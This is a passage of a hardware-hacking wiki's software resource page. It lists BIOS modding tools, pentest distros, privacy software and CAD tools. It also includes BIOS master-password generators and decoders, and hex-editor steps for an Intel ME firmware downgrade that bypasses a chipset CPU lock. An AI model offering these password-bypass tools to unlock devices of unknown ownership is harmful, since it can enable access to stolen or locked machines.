:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.&lt;br /&gt;
&lt;br /&gt;
:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]&lt;br /&gt;
&lt;br /&gt;
:::'''Tool collections'''&lt;br /&gt;
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.&lt;br /&gt;
&lt;br /&gt;
:::'''Microcode Extraction Tool'''&lt;br /&gt;
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.&lt;br /&gt;
&lt;br /&gt;
:Bios password resetting&lt;br /&gt;
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.&lt;br /&gt;
&lt;br /&gt;
::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).&lt;br /&gt;
&lt;br /&gt;
::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called &amp;quot;AMITSEDecrypt&amp;quot; to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.&lt;br /&gt;
&lt;br /&gt;
::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====HM70 PCH chipset Bypass Unsupported CPU=====&lt;br /&gt;
:Machine shuts down after 30 minutes if a '''&amp;quot;unsupported CPU&amp;quot;''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset.&amp;lt;br&amp;gt;&lt;br /&gt;
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..]&amp;lt;br&amp;gt;&lt;br /&gt;
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.&lt;br /&gt;
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium &amp;amp; Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]&lt;br /&gt;
&lt;br /&gt;
======Intel Management Engine Firmware Downgrade Attack======&lt;br /&gt;
&lt;br /&gt;
::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.&lt;br /&gt;
::Then download the Intel ME version just below the firmware version you try to downgrade.&lt;br /&gt;
::Fire up your hex editor search in your bios blob for '''&amp;quot;0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20&amp;quot;''' Intel ME 1.5M blob will start ascii text '''&amp;quot;$FPT&amp;quot;'''.&lt;br /&gt;
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.&lt;br /&gt;
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.&lt;br /&gt;
&lt;br /&gt;
::This downgrade attack &amp;lt;u&amp;gt;successfully bypassed&amp;lt;/u&amp;gt; the 30 minute shutdown restriction timer.&lt;br /&gt;
&lt;br /&gt;
:'''Required tools''':&lt;br /&gt;
::*[[Software_Tools#Hex_Editors|Hex Editor.]]&lt;br /&gt;
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine &amp;amp; Graphics Firmware Analysis Tool.&lt;br /&gt;
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.&lt;br /&gt;
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.&lt;br /&gt;
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Operating Systems====&lt;br /&gt;
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.&lt;br /&gt;
=====Mostly X86-64=====&lt;br /&gt;
======Penetration Testing &amp;amp; Digital Forensics======&lt;br /&gt;
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.&lt;br /&gt;
&lt;br /&gt;
*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.&lt;br /&gt;
&lt;br /&gt;
*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.&lt;br /&gt;
&lt;br /&gt;
*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.&lt;br /&gt;
&lt;br /&gt;
======RF Signals Analysis OS [RISC SBC &amp;amp; X86-64]======&lt;br /&gt;
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.&lt;br /&gt;
&lt;br /&gt;
======Privacy Operating System======&lt;br /&gt;
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.&lt;br /&gt;
*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.&lt;br /&gt;
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.&lt;br /&gt;
&lt;br /&gt;
======Windows 10 IoT LTSC======&lt;br /&gt;
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat &amp;amp; setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032. &lt;br /&gt;
&lt;br /&gt;
*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.&lt;br /&gt;
&lt;br /&gt;
======Previous Windows versions======&lt;br /&gt;
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.&lt;br /&gt;
&lt;br /&gt;
=====Embedded Devices [Network equipment]=====&lt;br /&gt;
&lt;br /&gt;
*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.&lt;br /&gt;
&lt;br /&gt;
*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.&lt;br /&gt;
&lt;br /&gt;
*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.&lt;br /&gt;
&lt;br /&gt;
=====Smartphones [Android &amp;quot;de-google&amp;quot;]=====&lt;br /&gt;
&lt;br /&gt;
*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.&lt;br /&gt;
&lt;br /&gt;
*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.&lt;br /&gt;
&lt;br /&gt;
*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.&lt;br /&gt;
&lt;br /&gt;
*[https://calyxos.org/ CalyxOS] - is a privacy-focused, &amp;quot;de-googled&amp;quot; Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.&lt;br /&gt;
&lt;br /&gt;
*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.&lt;br /&gt;
&lt;br /&gt;
*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Tools for opening CAD or Boardview files====&lt;br /&gt;
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.&lt;br /&gt;
&lt;br /&gt;
*[https://pldaniels.com/flexbv5/ FlexBV]  - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards&lt;br /&gt;
&lt;br /&gt;
*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the &amp;quot;Test_Link&amp;quot; software and &amp;quot;Landrex&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.&lt;br /&gt;
&lt;br /&gt;
*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.&lt;br /&gt;
&lt;br /&gt;
*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]&lt;br /&gt;
&lt;br /&gt;
For resources to open in your favorite boardview program visit &lt;br /&gt;
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -&amp;gt; Datasheets boardviews &amp;amp; schematics]]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Custom PCB Development Software====&lt;br /&gt;
&lt;br /&gt;
=====Definition and Purpose=====&lt;br /&gt;
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.&lt;br /&gt;
&lt;br /&gt;
::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.&lt;br /&gt;
&lt;br /&gt;
::'''Integration Between CAD and EDA'''&lt;br /&gt;
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.&lt;br /&gt;
&lt;br /&gt;
=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.&lt;br /&gt;
&lt;br /&gt;
*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].&lt;br /&gt;
&lt;br /&gt;
*[https://fritzing.org/ Fritzing] -  is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.&lt;br /&gt;
&lt;br /&gt;
*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.&lt;br /&gt;
&lt;br /&gt;
*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.&lt;br /&gt;
&lt;br /&gt;
*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.&lt;br /&gt;
&lt;br /&gt;
=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.&lt;br /&gt;
&lt;br /&gt;
*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.&lt;br /&gt;
&lt;br /&gt;
*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.&lt;br /&gt;
&lt;br /&gt;
*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
====Other software====&lt;br /&gt;
&lt;br /&gt;
=====Display Driver Utilities (Windows)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).&lt;br /&gt;
&lt;br /&gt;
*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing &amp;quot;bloatware&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.&lt;br /&gt;
&lt;br /&gt;
*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively &amp;quot;trimming&amp;quot; down the install base. It's not an official Nvidia utility.&lt;br /&gt;
&lt;br /&gt;
=====Host Based Firewall [Windows FOSS]=====&lt;br /&gt;
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.&lt;br /&gt;
&lt;br /&gt;
=====Web Browsing=====&lt;br /&gt;
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.&lt;br /&gt;
&lt;br /&gt;
::Extensions &amp;amp; Configurations&lt;br /&gt;
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.&lt;br /&gt;
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.&lt;br /&gt;
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.&lt;br /&gt;
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.&lt;br /&gt;
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.&lt;br /&gt;
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.&lt;br /&gt;
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] -  is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.&lt;br /&gt;
&lt;br /&gt;
======Public Networks======&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.&lt;br /&gt;
&lt;br /&gt;
*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.&lt;br /&gt;
&lt;br /&gt;
*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.&lt;br /&gt;
&lt;br /&gt;
*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.&lt;br /&gt;
&lt;br /&gt;
*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.&lt;br /&gt;
&lt;br /&gt;
*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.&lt;br /&gt;
&lt;br /&gt;
=====Email Clients / Email Encryption Standards=====&lt;br /&gt;
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].&lt;br /&gt;
&lt;br /&gt;
*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.&lt;br /&gt;
&lt;br /&gt;
*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].&lt;br /&gt;
&lt;br /&gt;
*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.&lt;br /&gt;
&lt;br /&gt;
=====Chat Applications / Platforms=====&lt;br /&gt;
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.&lt;br /&gt;
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.&lt;br /&gt;
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.&lt;br /&gt;
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.&lt;br /&gt;
::XMPP clients&lt;br /&gt;
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.&lt;br /&gt;
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.&lt;br /&gt;
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.&lt;br /&gt;
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.&lt;br /&gt;
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.&lt;br /&gt;
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.&lt;br /&gt;
::Discord client advice&lt;br /&gt;
:::*1. Stop using the installed electron PC based version. Use the web version.&lt;br /&gt;
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).&lt;br /&gt;
&lt;br /&gt;
=====File Archiver Utilities=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.7-zip.org/ 7-Zip]  - is a free and open source file archiver.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.&lt;br /&gt;
&lt;br /&gt;
*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.&lt;br /&gt;
&lt;br /&gt;
=====Disk Encryption Software=====&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools&lt;br /&gt;
&lt;br /&gt;
*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].&lt;br /&gt;
&lt;br /&gt;
=====Image Manipulation Tools=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.&lt;br /&gt;
&lt;br /&gt;
*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.&lt;br /&gt;
&lt;br /&gt;
=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.&lt;br /&gt;
&lt;br /&gt;
*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.&lt;br /&gt;
&lt;br /&gt;
*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.&lt;br /&gt;
&lt;br /&gt;
*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.&lt;br /&gt;
&lt;br /&gt;
*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.&lt;br /&gt;
&lt;br /&gt;
*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.&lt;br /&gt;
&lt;br /&gt;
*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.&lt;br /&gt;
&lt;br /&gt;
=====Video Recording and Live Streaming=====&lt;br /&gt;
&lt;br /&gt;
*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.&lt;br /&gt;
&lt;br /&gt;
*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.&lt;br /&gt;
&lt;br /&gt;
====Search engine (self-hosted &amp;amp; open-source)====&lt;br /&gt;
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.&lt;br /&gt;
&lt;br /&gt;
